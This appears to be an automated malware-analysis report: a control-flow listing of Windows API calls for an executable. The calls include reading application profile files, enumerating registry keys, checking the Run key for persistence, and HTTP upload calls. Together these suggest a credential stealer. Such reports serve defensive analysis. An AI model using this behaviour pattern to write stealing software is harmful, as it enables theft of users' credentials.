6099 4069fd 3 API calls 6097->6099 6101 406bc3 6097->6101 6099->6101 6100->6064 6100->6065 6101->6100 6102 406c03 RegOpenKeyExW 6101->6102 6103 406c21 6102->6103 6106 406c31 6102->6106 6110 4069c0 RegQueryValueExW RegCloseKey 6103->6110 6105 4069fd 3 API calls 6105->6100 6106->6100 6106->6105 6107->6086 6108->6094 6109->6097 6110->6106 6112 40760a CreateFileW 6111->6112 6113 407622 6111->6113 6112->6113 6114 40762a GetFileSize GetProcessHeap RtlAllocateHeap 6112->6114 6113->5804 6114->6113 6115 407650 ReadFile 6114->6115 6115->6113 6116 40766a 6115->6116 6116->6113 6117 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6116->6117 6120 40584d 6117->6120 6119 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6119->6113 6120->6119 6122 40d53c __VEC_memzero 6121->6122 6122->5812 6123->5820 6124->5816 6846 401006 6847 40101f 6846->6847 6848 407499 5 API calls 6847->6848 6851 4010c1 6847->6851 6849 4010ce 6848->6849 6850 407552 Sleep 6849->6850 6849->6851 6850->6851 6852 409a07 6855 409a14 6852->6855 6853 409a92 6854 409a6d SysAllocString 6854->6853 6855->6853 6855->6854 6856 403287 6857 403292 6856->6857 6858 4032aa 6856->6858 6857->6858 6860 408604 RegOpenKeyExW 6857->6860 6861 408632 6860->6861 6862 40864a GetLastError 6860->6862 6870 4069c0 RegQueryValueExW RegCloseKey 6861->6870 6864 408654 6862->6864 6865 408658 6862->6865 6864->6857 6867 408682 DeleteFileW 6865->6867 6868 40866a 6865->6868 6866 408646 6866->6862 6867->6864 6869 4069fd 3 API calls 6868->6869 6869->6864 6870->6866 6880 40ce08 6881 40ce1a 6880->6881 6883 40ce28 @_EH4_CallFilterFunc@8 6880->6883 6882 40cd66 __except_handler4 5 API calls 6881->6882 6882->6883 6884 409909 6885 409916 6884->6885 6892 409723 6885->6892 6887 409a02 6888 409934 6888->6887 6889 409723 __VEC_memcpy 6888->6889 6890 4099d5 6889->6890 6890->6887 6891 4099de SysAllocString SysAllocString 6890->6891 6891->6887 6893 409733 6892->6893 6894 40c5d0 __VEC_memcpy 6893->6894 6895 409772 6893->6895 6894->6895 6895->6888 6210 4047cc 6211 40821c PathCombineW 6210->6211 6212 4047f1 6211->6212 6213 404800 6212->6213 6214 404843 6212->6214 6218 40483b 6212->6218 6217 408248 8 API calls 6213->6217 6234 4083c4 CreateFileW 6214->6234 6217->6218 6221 404a61 6223 404a79 6221->6223 6224 404a69 VirtualFree 6221->6224 6222 40487b HeapAlloc 6231 404896 6222->6231 6223->6218 6225 404a7f CloseHandle 6223->6225 6224->6223 6225->6218 6226 404a4a 6227 40be3a HeapFree 6226->6227 6228 404a53 6227->6228 6255 40be54 6228->6255 6230 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6230->6231 6231->6226 6231->6230 6233 40c00b 3 API calls 6231->6233 6250 40c3f9 6231->6250 6233->6231 6235 4083ea GetFileSizeEx 6234->6235 6236 404854 6234->6236 6237 4083f9 6235->6237 6238 40844f CloseHandle 6235->6238 6236->6218 6243 40c290 6236->6243 6237->6236 6237->6238 6239 40840e VirtualAlloc 6237->6239 6238->6236 6239->6238 6240 408423 ReadFile 6239->6240 6241 408441 VirtualFree 6240->6241 6242 408439 6240->6242 6241->6238 6242->6236 6242->6241 6244 40486e 6243->6244 6249 40c2b6 6243->6249 6244->6221 6244->6222 6245 40bde1 3 API calls 6245->6249 6246 40c340 6247 40be54 HeapFree 6246->6247 6247->6244 6249->6244 6249->6245 6249->6246 6261 40c05c 6249->6261 6251 40c402 6250->6251 6252 40c407 6250->6252 6251->6231 6253 40c412 wvnsprintfW 6252->6253 6254 40c42e 6253->6254 6254->6231 6257 40be5b 6255->6257 6260 40be73 6255->6260 6256 40be3a HeapFree 6256->6257 6257->6256 6258 40be6d 6257->6258 6257->6260 6259 40be3a HeapFree 6258->6259 6259->6260 6260->6221 6262 40c066 6261->6262 6263 40c06a 6261->6263 6262->6249 6263->6262 6266 40be27 HeapAlloc 6263->6266 6265 40c086 6265->6249 6266->6265 6896 40978d 6897 40979a 6896->6897 6898 409655 __VEC_memcpy 6897->6898 6899 4097b3 6898->6899 6900 4097ba 6899->6900 6901 409655 __VEC_memcpy 6899->6901 6902 4097d6 6901->6902 6903 409805 6902->6903 6904 4097df SysAllocString SysAllocString 6902->6904 6904->6903 6905 402d0e 6906 40267a 122 API calls 6905->6906 6907 402d32 6906->6907 6910 409c6f 6907->6910 6911 402d3a 6910->6911 6912 409c7a SysFreeString 6910->6912 6912->6911 6912->6912 6913 40350f 6914 40821c PathCombineW 6913->6914 6915 403531 6914->6915 6916 40354d 6915->6916 6917 403540 6915->6917 6918 403553 HeapAlloc 6915->6918 6919 4034a8 8 API calls 6917->6919 6918->6916 6920 403576 GetPrivateProfileStringW 6918->6920 6919->6916 6921 403594 6920->6921 6922 40372c 6920->6922 6921->6922 6924 4035a8 HeapAlloc 6921->6924 6923 40be3a HeapFree 6922->6923 6923->6916 6924->6922 6931 4035c5 6924->6931 6925 403627 GetPrivateProfileStringW 6926 403643 GetPrivateProfileIntW 6925->6926 6925->6931 6927 403669 GetPrivateProfileStringW 6926->6927 6926->6931 6928 40368b GetPrivateProfileStringW 6927->6928 6927->6931 6928->6931 6929 403723 6930 40be3a HeapFree 6929->6930 6930->6922 6931->6925 6931->6929 6932 40c3f9 wvnsprintfW 6931->6932 6933 40c00b 3 API calls 6931->6933 6932->6931 6933->6931 6267 40cbd0 6268 40cc08 6267->6268 6269 40cbfb 6267->6269 6271 40cd66 __except_handler4 5 API calls 6268->6271 6285 40cd66 6269->6285 6274 40cc18 __except_handler4 6271->6274 6272 40cc9f 6273 40cc74 __except_handler4 6273->6272 6275 40cc8f 6273->6275 6276 40cd66 __except_handler4 5 API calls 6273->6276 6274->6272 6274->6273 6279 40ccb5 _CallDestructExceptionObject 6274->6279 6277 40cd66 __except_handler4 5 API calls 6275->6277 6276->6275 6277->6272 6293 40ce9a RtlUnwind 6279->6293 6280 40ccf4 __except_handler4 6281 40cd2b 6280->6281 6282 40cd66 __except_handler4 5 API calls 6280->6282 6283 40cd66 __except_handler4 5 API calls 6281->6283 6282->6281 6284 40cd3b __except_handler3 6283->6284 6286 40cd70 IsDebuggerPresent 6285->6286 6287 40cd6e 6285->6287 6295 40d247 6286->6295 6287->6268 6290 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6291 40d0f3 __except_handler4 6290->6291 6292 40d0fb GetCurrentProcess TerminateProcess 6290->6292 6291->6292 6292->6268 6294 40ceaf 6293->6294 6294->6280 6295->6290 6940 40d990 6941 40d993 VirtualQuery 6940->6941 6943 40d9b2 6941->6943 6945 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6941->6945 6944 40d9cc GetVersionExA 6943->6944 6943->6945 6944->6945 6296 401652 6297 401665 6296->6297 6301 4016f6 6297->6301 6302 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6297->6302 6299 4016da 6300 407552 Sleep 6299->6300 6299->6301 6300->6301 6303 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6302->6303 6303->6299 6946 402214 6949 402233 6946->6949 6947 402319 6948 402386 6947->6948 6954 401c41 6947->6954 6949->6947 6951 408091 3 API calls 6949->6951 6951->6947 6952 402478 6952->6948 6953 408091 3 API calls 6952->6953 6953->6948 6959 401c4e 6954->6959 6955 401e07 6958 407267 3 API calls 6955->6958 6960 401d15 6955->6960 6956 401d0e 6957 407267 3 API calls 6956->6957 6957->6960 6958->6960 6959->6955 6959->6956 6960->6952 6304 402dd5 6307 40267a 6304->6307 6313 40268a 6307->6313 6308 4027dd 6309 4026ee GetTickCount 6309->6313 6312 407552 Sleep 6312->6313 6313->6308 6313->6309 6313->6312 6314 4027e6 OleInitialize 6313->6314 6375 40a8f9 6313->6375 6392 40a469 6314->6392 6316 402806 6322 40280b 6316->6322 6399 40a345 6316->6399 6319 402851 6405 40a65e 6319->6405 6320 40285f 6323 40286e 6320->6323 6408 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6320->6408 6322->6313 6410 409f2b 6323->6410 6326 402884 6327 4028b4 6326->6327 6332 402943 6326->6332 6418 408f26 6326->6418 6330 408f26 10 API calls 6327->6330 6327->6332 6329 402c20 6331 40a65e Sleep 6329->6331 6333 4028ea 6330->6333 6331->6322 6332->6329 6337 4029aa 6332->6337 6443 4089fd 6332->6443 6334 4028f1 6333->6334 6335 402956 6333->6335 6342 402904 SysAllocString 6334->6342 6338 40a65e Sleep 6335->6338 6340 4029e6 6337->6340 6343 4089fd 5 API calls 6337->6343 6338->6332 6339 402a3b 6346 408f26 10 API calls 6339->6346 6348 402a6f 6339->6348 6340->6339 6452 40920a 6340->6452 6345 402927 SysFreeString 6342->6345 6350 40293a 6342->6350 6343->6340 6344 402a17 6457 409c49 6344->6457 6345->6345 6345->6350 6351 402a62 SysAllocString 6346->6351 6347 402aa2 6353 402ad1 6347->6353 6358 408f26 10 API calls 6347->6358 6348->6347 6352 408f26 10 API calls 6348->6352 6350->6332 6437 4091bd 6350->6437 6351->6348 6357 402a95 SysAllocString 6352->6357 6354 402b04 6353->6354 6359 408f26 10 API calls 6353->6359 6360 40a65e Sleep 6354->6360 6357->6347 6361 402ac4 SysAllocString 6358->6361 6362 402af7 SysAllocString 6359->6362 6363 402b0e 6360->6363 6361->6353 6362->6354 6364 409c49 SysAllocString 6363->6364 6365 402b6b 6363->6365 6364->6365 6366 402b83 6365->6366 6367 409c49 SysAllocString 6365->6367 6368 402be3 6366->6368 6369 402bea 6366->6369 6367->6366 6460 408825 6368->6460 6484 408692 6369->6484 6372 402be8 SysFreeString 6372->6329 6374 402c11 SysFreeString 6372->6374 6374->6329 6374->6374 6376 40a906 6375->6376 6377 406d14 2 API calls 6376->6377 6378 40a917 Sleep 6376->6378 6379 40a92c 6376->6379 6377->6376 6378->6376 6380 4078cb 12 API calls 6379->6380 6381 40aa37 6380->6381 6382 406cb5 GetVersionExW 6381->6382 6383 40aa52 6382->6383 6384 40a718 5 API calls 6383->6384 6385 40aa7e 6384->6385 6386 40a744 5 API calls 6385->6386 6388 40aa91 6386->6388 6387 406e69 22 API calls 6387->6388 6388->6387 6389 40aabc Sleep 6388->6389 6390 40aae5 GetProcessHeap HeapFree 6388->6390 6391 40a744 5 API calls 6388->6391 6389->6388 6390->6313 6391->6388 6393 40a479 6392->6393 6395 40a4ef 6393->6395 6396 40a4dc 6393->6396 6500 40a156 6393->6500 6395->6316 6396->6395 6397 40a530 InternetOpenW 6396->6397 6397->6395 6398 40a545 InternetSetOptionW 6397->6398 6398->6395 6400 40a352 6399->6400 6402 40284a 6400->6402 6403 40a442 6400->6403 6517 40a245 6400->6517 6402->6319 6402->6320 6403->6402 6525 40a2d9 6403->6525 6407 40a662 Sleep 6405->6407 6407->6322 6409 40735e __aulldiv 6408->6409 6409->6323 6411 409f37 6410->6411 6412 409f40 GetTickCount 6411->6412 6413 409f5f GetTickCount 6412->6413 6414 409f67 PeekMessageW 6413->6414 6417 409fa7 6413->6417 6415 409f88 Sleep 6414->6415 6416 409f7c DispatchMessageW 6414->6416 6415->6413 6416->6414 6417->6326 6541 40a582 6418->6541 6420 408f35 6421 408f78 SysFreeString 6420->6421 6428 408f96 6420->6428 6429 408f3e 6420->6429 6421->6421 6421->6428 6422 409039 6423 409040 6422->6423 6424 409043 SysFreeString 6422->6424 6425 409058 6422->6425 6423->6424 6424->6429 6426 409091 GetTickCount 6425->6426 6427 40905f 6425->6427 6436 4090ae 6426->6436 6430 40908f 6427->6430 6431 40906a SysAllocString 6427->6431 6428->6422 6432 409025 SysFreeString 6428->6432 6429->6327 6433 409108 SysFreeString 6430->6433 6434 40911b SysFreeString 6430->6434 6431->6427 6432->6428 6433->6433 6433->6434 6434->6429 6435 4090c7 SysAllocString 6435->6436 6436->6430 6436->6435 6438 40a582 2 API calls 6437->6438 6439 4091cc 6438->6439 6440 4091d2 6439->6440 6549 409655 6439->6549 6440->6332 6444 408a1a 6443->6444 6445 408bc4 6444->6445 6447 408c0d VariantClear 6444->6447 6448 408a1e 6444->6448 6449 408b99 SysFreeString 6444->6449 6450 408bab VariantClear 6444->6450 6451 408b6b SysFreeString 6444->6451 6446 408c1c GetTickCount 6445->6446 6445->6448 6446->6448 6447->6448 6448->6337 6449->6444 6450->6444 6450->6445 6451->6444 6456 409217 6452->6456 6453 409295 SysAllocString 6453->6344 6456->6453 6553 408091 6456->6553 6458 409c54 SysAllocString 6457->6458 6459 402a27 SysAllocString SysFreeString 6457->6459 6458->6459 6459->6339 6461 408832 6460->6461 6462 40a469 14 API calls 6461->6462 6464 408857 6462->6464 6463 40885c 6463->6372 6464->6463 6465 40a345 22 API calls 6464->6465 6473 408883 6465->6473 6466 40888a 6468 40a65e Sleep 6466->6468 6467 4088eb 6469 409f2b 5 API calls 6467->6469 6468->6463 6470 4088f6 6469->6470 6471 4089fd 5 API calls 6470->6471 6472 408911 6471->6472 6472->6466 6481 40891f 6472->6481 6473->6466 6473->6467 6561 409301 6473->6561 6475 4089f0 SysFreeString 6477 40a65e Sleep 6477->6481 6478 40a469 14 API calls 6478->6481 6479 40a345 22 API calls 6479->6481 6480 409f2b 5 API calls 6480->6481 6481->6475 6481->6477 6481->6478 6481->6479 6481->6480 6482 409301 7 API calls 6481->6482 6483 4089cd SysFreeString SysFreeString 6482->6483 6483->6481 6485 40a469 14 API calls 6484->6485 6487 4086b1 6485->6487 6486 4086b6 6486->6372 6487->6486 6488 40a345 22 API calls 6487->6488 6489 4086de 6488->6489 6490 4086e5 6489->6490 6491 4086f8 6489->6491 6492 40a65e Sleep 6490->6492 6493 409f2b 5 API calls 6491->6493 6492->6486 6495 408703 6493->6495 6494 40874a CharLowerW SysFreeString 6499 40876c 6494->6499 6495->6494 6496 408811 6498 409f2b 5 API calls 6498->6499 6499->6496 6499->6498 6572 408cb7 6499->6572 6501 40a16a 6500->6501 6504 40a16f 6500->6504 6512 40a0b5 CoInitialize 6501->6512 6506 40a188 SysAllocString 6504->6506 6515 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 6504->6515 6508 40a1b8 6506->6508 6507 40a224 6507->6396 6508->6507 6509 40a1ce FindWindowW 6508->6509 6510 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 6509->6510 6511 40a1de SetParent 6509->6511 6510->6507 6511->6510 6513 40a0cc GetModuleHandleW CreateWindowExW 6512->6513 6514 40a0fd 6513->6514 6514->6504 6516 40a093 6515->6516 6516->6506 6516->6507 6518 40a262 _memset 6517->6518 6519 40a2d6 6517->6519 6520 40a270 SysAllocString SysAllocString 6518->6520 6519->6403 6521 40a2b3 6520->6521 6522 40a2c3 SysFreeString SysFreeString 6521->6522 6531 409fb1 6521->6531 6522->6519 6524 40a2c2 6524->6522 6526 40a2f4 6525->6526 6530 40a2f0 6525->6530 6527 40a313 6526->6527 6528 40a2fe GetProcessHeap HeapFree 6526->6528 6529 409c99 11 API calls 6527->6529 6528->6527 6529->6530 6530->6402 6540 40d258 6531->6540 6533 409fbd GetTickCount 6538 409fd3 6533->6538 6534 409fde GetTickCount 6535 409fea Sleep 6534->6535 6537 40a030 6534->6537 6536 409ff2 PeekMessageW 6535->6536 6536->6538 6539 40a005 DispatchMessageW 6536->6539 6537->6524 6538->6534 6538->6537 6539->6536 6540->6533 6542 40a5a0 6541->6542 6543 40a5a4 6541->6543 6542->6420 6544 40a63f 6543->6544 6547 40a5ae 6543->6547 6545 40a64e SysAllocString 6544->6545 6546 40a63b 6544->6546 6545->6546 6546->6420 6547->6546 6548 40a632 SysFreeString 6547->6548 6548->6546 6551 40966d 6549->6551 6550 4091eb SysFreeString 6550->6440 6551->6550 6552 40c5d0 __VEC_memcpy 6551->6552 6552->6550 6555 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6553->6555 6554 408212 6554->6456 6555->6554 6557 407f4f 6555->6557 6558 407f5c 6557->6558 6559 407f71 6558->6559 6560 4072ed 3 API calls 6558->6560 6559->6555 6560->6559 6562 409314 6561->6562 6563 40933b CharLowerW 6562->6563 6567 409364 6562->6567 6571 4088de SysFreeString SysFreeString 6562->6571 6564 409351 6563->6564 6565 409362 SysFreeString 6564->6565 6566 409359 SysFreeString 6564->6566 6565->6567 6566->6571 6568 4093ae SysAllocString SysAllocString 6567->6568 6567->6571 6570 4093d7 SysFreeString SysFreeString 6568->6570 6570->6571 6571->6467 6573 408cd2 6572->6573 6574 408f17 VariantClear 6573->6574 6575 408e8f 6573->6575 6576 408cd6 6573->6576 6578 408e6d SysFreeString 6573->6578 6579 408e76 VariantClear 6573->6579 6580 408e2c SysFreeString 6573->6580 6582 409581 6573->6582 6574->6576 6575->6576 6577 408ed5 SysAllocString 6575->6577 6576->6499 6577->6576 6578->6579 6579->6573 6579->6575 6580->6573 6583 409591 6582->6583 6584 409595 6583->6584 6585 409599 CharLowerW 6583->6585 6584->6573 6586 4095fb 6585->6586 6588 4095b3 6585->6588 6587 40960a SysFreeString 6586->6587 6587->6573 6588->6586 6588->6587 6589 4095d5 CharLowerW 6588->6589 6590 4095df 6589->6590 6591 409605 SysFreeString 6590->6591 6591->6587 6961 403e18 6962 40821c PathCombineW 6961->6962 6963 403e3d 6962->6963 6964 403e87 6963->6964 6965 403e4c 6963->6965 6966 403e8f 6963->6966 6968 408248 8 API calls 6965->6968 6967 40c519 4 API calls 6966->6967 6970 403e9c 6967->6970 6968->6964 6969 40c5b9 SysFreeString 6969->6970 6970->6964 6970->6969 6971 40c43d 4 API calls 6970->6971 6972 40c00b 3 API calls 6970->6972 6973 40be3a HeapFree 6970->6973 6971->6970 6972->6970 6973->6970 6974 409a99 6975 409aa6 6974->6975 6976 409723 __VEC_memcpy 6975->6976 6977 409ac4 6976->6977 6978 409b18 6977->6978 6979 409723 __VEC_memcpy 6977->6979 6980 409ae9 6979->6980 6980->6978 6981 409af2 SysAllocString SysAllocString 6980->6981 6981->6978 6982 409f99 Sleep 6983 409fa7 6982->6983 6592 402c62 6601 406c77 RegOpenKeyExW 6592->6601 6594 402c77 6595 406cb5 GetVersionExW 6594->6595 6596 402c7c 6595->6596 6597 40a8f9 34 API calls 6596->6597 6598 402c8f 6597->6598 6599 40267a 122 API calls 6598->6599 6600 402ca8 6599->6600 6602 406c9b 6601->6602 6603 406c9f 6601->6603 6602->6594 6606 4069c0 RegQueryValueExW RegCloseKey 6603->6606 6605 406cb0 6605->6594 6606->6605 6984 40d2a4 6985 40d2ac 6984->6985 6986 40d378 __except_handler3 6985->6986 6990 40d790 6985->6990 6989 40d2e5 __except_handler3 _CallDestructExceptionObject 6989->6986 6996 40d110 RtlUnwind 6989->6996 6994 40d7e5 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6990->6994 6995 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6990->6995 6991 40d99d VirtualQuery 6992 40d9b2 6991->6992 6991->6995 6993 40d9cc GetVersionExA 6992->6993 6992->6995 6993->6995 6994->6991 6994->6995 6995->6989 6997 40d128 6996->6997 6997->6989 6607 4053ea HeapCreate 6608 405408 GetProcessHeap 6607->6608 6609 40541c 6607->6609 6608->6609 6626 403740 6609->6626 6627 40375a 6626->6627 6743 40848f RegOpenKeyExW 6627->6743 6630 4037a2 ExpandEnvironmentStringsW 6753 4034a8 6630->6753 6631 403846 6635 40be3a HeapFree 6631->6635 6632 40383c 6757 4033a0 6632->6757 6636 403844 6635->6636 6641 403c10 6636->6641 6637 4037f6 SHGetFolderPathW 6638 4037c3 6637->6638 6638->6637 6639 403837 6638->6639 6640 408248 8 API calls 6638->6640 6639->6631 6639->6632 6640->6638 6642 403c29 6641->6642 6643 40848f 7 API calls 6642->6643 6644 403c6d 6643->6644 6645 403c79 ExpandEnvironmentStringsW 6644->6645 6654 403ca9 6644->6654 6771 4039ea HeapAlloc 6645->6771 6647 403e00 6650 4033a0 HeapFree 6647->6650 6648 403e0a 6651 40be3a HeapFree 6648->6651 6652 403e08 6650->6652 6651->6652 6663 4040e7 6652->6663 6653 403d18 SHGetFolderPathW 6653->6654 6654->6653 6656 408248 8 API calls 6654->6656 6657 403d88 6654->6657 6660 403df7 6654->6660 6788 4039a3 6654->6788 6656->6654 6658 40848f 7 API calls 6657->6658 6657->6660 6659 403dc8 6658->6659 6659->6660 6661 403dd4 ExpandEnvironmentStringsW 6659->6661 6660->6647 6660->6648 6662 4039a3 8 API calls 6661->6662 6662->6660 6667 404100 6663->6667 6664 40412c SHGetFolderPathW 6664->6667 6665 408248 8 API calls 6665->6667 6666 40416d 6668 404172 6666->6668 6669 40417c 6666->6669 6667->6664 6667->6665 6667->6666 6670 4033a0 HeapFree 6668->6670 6671 40be3a HeapFree 6669->6671 6672 40417a 6670->6672 6671->6672 6673 4041e4 HeapAlloc 6672->6673 6684 404453 6673->6684 6688 404212 6673->6688 6674 4042a0 RegOpenKeyExW 6674->6688 6675 40440f RegEnumKeyExW 6677 404427 RegCloseKey 6675->6677 6675->6688 6676 40443d 6678 40be3a HeapFree 6676->6678 6677->6688 6679 404445 6678->6679 6680 404455 6679->6680 6681 40444b 6679->6681 6683 40be3a HeapFree 6680->6683 6682 4033a0 HeapFree 6681->6682 6682->6684 6683->6684 6691 40451b 6684->6691 6685 40848f 7 API calls 6685->6688 6686 40435e RegOpenKeyExW 6686->6688 6687 40845d 2 API calls 6687->6688 6688->6674 6688->6675 6688->6676 6688->6685 6688->6686 6688->6687 6689 40c3f9 wvnsprintfW 6688->6689 6690 40c00b 3 API calls 6688->6690 6689->6688 6690->6688 6792 40be9d 6691->6792 6693 404535 HeapAlloc 6694 404786 6693->6694 6701 404555 6693->6701 6695 404796 6694->6695 6696 40478c 6694->6696 6698 40be3a HeapFree 6695->6698 6697 4033a0 HeapFree 6696->6697 6699 404794 6697->6699 6698->6699 6711 404a92 6699->6711 6700 4045c5 RegOpenKeyExW 6700->6701 6702 4045e8 RegEnumKeyExW 6700->6702 6701->6700 6703 404780 6701->6703 6704 40476a RegCloseKey 6701->6704 6706 40473d RegEnumKeyExW 6701->6706 6707 40848f 7 API calls 6701->6707 6709 40c3f9 wvnsprintfW 6701->6709 6710 40c00b 3 API calls 6701->6710 6793 40854c RegOpenKeyExW 6701->6793 6702->6701 6705 40be3a HeapFree 6703->6705 6704->6701 6705->6694 6706->6701 6707->6701 6709->6701 6710->6701 6713 404aab 6711->6713 6712 404ad7 SHGetFolderPathW 6712->6713 6713->6712 6714 408248 8 API calls 6713->6714 6715 404b18 6713->6715 6714->6713 6716 404b27 6715->6716 6717 404b1d 6715->6717 6719 40be3a HeapFree 6716->6719 6718 4033a0 HeapFree 6717->6718 6720 404b25 6718->6720 6719->6720 6721 405136 6720->6721 6723 405150 6721->6723 6722 40848f 7 API calls 6722->6723 6723->6722 6724 40520b 6723->6724 6725 4051e0 ExpandEnvironmentStringsW 6723->6725 6727 405211 6724->6727 6728 40521b 6724->6728 6726 404e7b 8 API calls 6725->6726 6726->6723 6729 4033a0 HeapFree 6727->6729 6730 40be3a HeapFree 6728->6730 6731 405219 6729->6731 6730->6731 6732 405229 6731->6732 6733 405238 6732->6733 6734 407b4e 9 API calls 6733->6734 6735 4052e8 6734->6735 6736 406d14 2 API calls 6735->6736 6739 405361 Sleep 6735->6739 6742 405372 6735->6742 6736->6735 6737 40537c Sleep 6737->6742 6739->6735 6740 4053cb Sleep 6740->6742 6741 4053e0 6742->6737 6742->6740 6742->6741 6797 409df4 6742->6797 6744 4084af 6743->6744 6747 4084c5 6743->6747 6761 40845d RegQueryValueExW 6744->6761 6746 403796 6746->6630 6746->6638 6747->6746 6764 40bfd0 6747->6764 6749 408518 6750 40852e 6749->6750 6751 40851f ExpandEnvironmentStringsW 6749->6751 6752 408531 GetProcessHeap HeapFree 6750->6752 6751->6750 6751->6752 6752->6746 6754 4034bc 6753->6754 6755 408248 8 API calls 6754->6755 6756 40350a 6755->6756 6756->6638 6760 4033a4 6757->6760 6758 40be3a HeapFree 6759 4033d7 6758->6759 6759->6636 6760->6758 6762 408482 RegCloseKey 6761->6762 6763 40847f 6761->6763 6762->6747 6763->6762 6765 40bfd7 6764->6765 6766 40bfda 6764->6766 6765->6749 6767 40bff3 6766->6767 6770 40be27 HeapAlloc 6766->6770 6767->6749 6769 40bffa 6769->6749 6770->6769 6772 403a1a GetPrivateProfileStringW 6771->6772 6775 403bb9 PathRemoveFileSpecW 6771->6775 6773 403a36 6772->6773 6784 403baf 6772->6784 6776 403a48 HeapAlloc 6773->6776 6773->6784 6774 40be3a HeapFree 6774->6775 6775->6654 6776->6784 6785 403a64 6776->6785 6777 403ac8 StrStrIW 6778 403add StrStrIW 6777->6778 6777->6785 6779 403af2 GetPrivateProfileStringW 6778->6779 6778->6785 6780 403b09 GetPrivateProfileStringW 6779->6780 6779->6785 6781 403b26 GetPrivateProfileStringW 6780->6781 6780->6785 6781->6785 6782 403ba9 6783 40be3a HeapFree 6782->6783 6783->6784 6784->6774 6785->6777 6785->6782 6786 40c3f9 wvnsprintfW 6785->6786 6787 40c00b 3 API calls 6785->6787 6786->6785 6787->6785 6789 4039b7 6788->6789 6790 408248 8 API calls 6789->6790 6791 4039e5 6790->6791 6791->6654 6792->6693 6794 40856f 6793->6794 6796 408585 6793->6796 6795 40845d 2 API calls 6794->6795 6795->6796 6796->6701 6798 409e01 6797->6798 6810 40beea 6798->6810 6801 409eb1 HttpOpenRequestW 6802 409ead 6801->6802 6803 409ecf HttpSendRequestW 6801->6803 6802->6742 6805 40be3a HeapFree 6803->6805 6806 409eea 6805->6806 6806->6802 6807 409eef InternetReadFile 6806->6807 6807->6802 6808 409f0c 6807->6808 6818 40bf35 6808->6818 6812 40bef4 6810->6812 6822 40beb4 6812->6822 6814 409e3e InternetConnectW 6814->6801 6814->6802 6816 40bf1c 6816->6814 6817 40beb4 WideCharToMultiByte 6816->6817 6817->6814 6819 40bf3a 6818->6819 6820 40bf3f MultiByteToWideChar 6818->6820 6819->6820 6821 40bf58 6820->6821 6821->6802 6823 40bec3 WideCharToMultiByte 6822->6823 6824 40bebe 6822->6824 6825 40bedd 6823->6825 6824->6823 6825->6814 6826 40be27 HeapAlloc 6825->6826 6826->6816 7004 40d2ac 7005 40d2ca 7004->7005 7007 40d378 __except_handler3 7004->7007 7006 40d790 __except_handler3 2 API calls 7005->7006 7009 40d2e5 __except_handler3 _CallDestructExceptionObject 7006->7009 7008 40d110 __except_handler3 RtlUnwind 7008->7009 7009->7007 7009->7008 7010 402cad 7011 406c77 3 API calls 7010->7011 7012 402cc3 7011->7012 7013 406cb5 GetVersionExW 7012->7013 7014 402cc8 7013->7014 7015 40a8f9 34 API calls 7014->7015 7016 402cdb 7015->7016 7017 40267a 122 API calls 7016->7017 7018 402d00 7017->7018 7019 409c6f SysFreeString 7018->7019 7020 402d08 7019->7020 7021 4032af ExitProcess 7026 402c32 7027 40267a 122 API calls 7026->7027 7028 402c56 7027->7028 7029 409c6f SysFreeString 7028->7029 7030 402c5e 7029->7030 6827 402df3 6828 406c77 3 API calls 6827->6828 6829 402e08 6828->6829 6830 406cb5 GetVersionExW 6829->6830 6831 402e0d 6830->6831 6832 40a8f9 34 API calls 6831->6832 6833 402e20 6832->6833 6834 40267a 122 API calls 6833->6834 6835 402e39 6834->6835 7031 4094b6 7032 4094c9 7031->7032 7033 4094cd 7032->7033 7034 4094f3 CharLowerW CharLowerW 7032->7034 7035 4094e3 SysFreeString 7032->7035 7037 409560 7034->7037 7039 409512 7034->7039 7036 40957e 7035->7036 7038 40956f SysFreeString SysFreeString 7037->7038 7038->7036 7039->7037 7039->7038 7040 40953a CharLowerW 7039->7040 7041 409544 7040->7041 7042 40956a SysFreeString 7041->7042 7042->7038 7043 402db7 7044 40267a 122 API calls 7043->7044 7045 402dd1 7044->7045 7046 40183a 7047 401854 7046->7047 7048 408091 3 API calls 7047->7048 7051 401958 7047->7051 7049 40194a 7048->7049 7050 408091 3 API calls 7049->7050 7050->7051 7054 402e3e 7064 402e4d 7054->7064 7055 40327c 7056 402eb7 GetModuleFileNameW 7057 402ed6 GetCurrentDirectoryW 7056->7057 7056->7064 7057->7064 7058 402f2a GetLastError 7059 40a786 35 API calls 7058->7059 7059->7064 7060 403251 GetLastError 7060->7064 7061 403237 GetLastError 7061->7064 7062 40a786 35 API calls 7062->7064 7063 407552 Sleep 7063->7064 7064->7055 7064->7056 7064->7058 7064->7060 7064->7061 7064->7062 7064->7063 7065 40253c 50 API calls 7064->7065 7065->7064 7077 403bbf 7078 40821c PathCombineW 7077->7078 7079 403bdf 7078->7079 7080 403bf9 7079->7080 7081 403bfe 7079->7081 7082 403bee 7079->7082 7084 4039ea 12 API calls 7081->7084 7083 4039a3 8 API calls 7082->7083 7083->7080 7084->7080

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 121 40abd9-40abf5 call 40ac20 124 40abf7-40ac0c FindFirstFileW 121->124 125 40ac1a 121->125 124->125 126 40ac0e-40ac18 FindClose 124->126 127 40ac1c-40ac1f 125->127 126->127
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
